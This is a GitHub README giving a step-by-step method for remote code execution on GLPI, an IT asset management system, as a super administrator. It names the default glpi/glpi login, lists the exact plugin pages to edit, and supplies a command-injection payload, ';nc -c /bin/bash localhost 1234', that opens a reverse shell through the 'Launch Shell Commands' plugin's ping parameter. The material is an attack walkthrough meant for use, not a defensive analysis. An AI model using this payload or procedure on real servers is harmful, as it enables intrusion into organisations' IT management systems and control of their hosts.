Skip to content

Edr4/GLPI-RCE-Authenticated

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

GLPI-RCE-Authenticated

How to RCE as a glpi administrator

Gestionnaire Libre de Parc Informatique (GLPI) is a Free Asset and IT Management Software package, that provides ITIL Service Desk features, licenses tracking and software auditing.

https://github.com/glpi-project/glpi

Requirements

You need to be super administrator of glpi to add the plugin and perform the rce.
The default login is glpi / glpi

Exploitation

The technique consists in using a plugin which allows to execute commands on the system like ping or tracert and to divert it towards the reverse shell for example.

Initially you must add a key "GLPI network" in the general parameters of glpi what gives the rights to add extensions, you have just to create an account for free on the site of glpi and to copy paste the key.

in the Marketplace : /glpi/front/marketplace.php
Add the plugin named "Launch Shell Commands"

Edit the ping command page : /glpi/marketplace/shellcommands/front/shellcommand.form.php?id=1

Enter a random string in the tag and in the parameters you can run anything as a command using a semicolon
You can use this payload for reverse shell :

;nc -c /bin/bash localhost 1234

It is simply an "exec" of all the arguments there are no filters
We control the variable $commandToExec

image

Add a ping command group : /glpi/marketplace/shellcommands/front/commandgroup.php

To finish to execute the payload: /glpi/marketplace/shellcommands/front/advanced_execution.php
Select the ping command group, a category and a device from the list (if you don't have one you can create one in Assets)

About

How to RCE as a glpi administrator

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published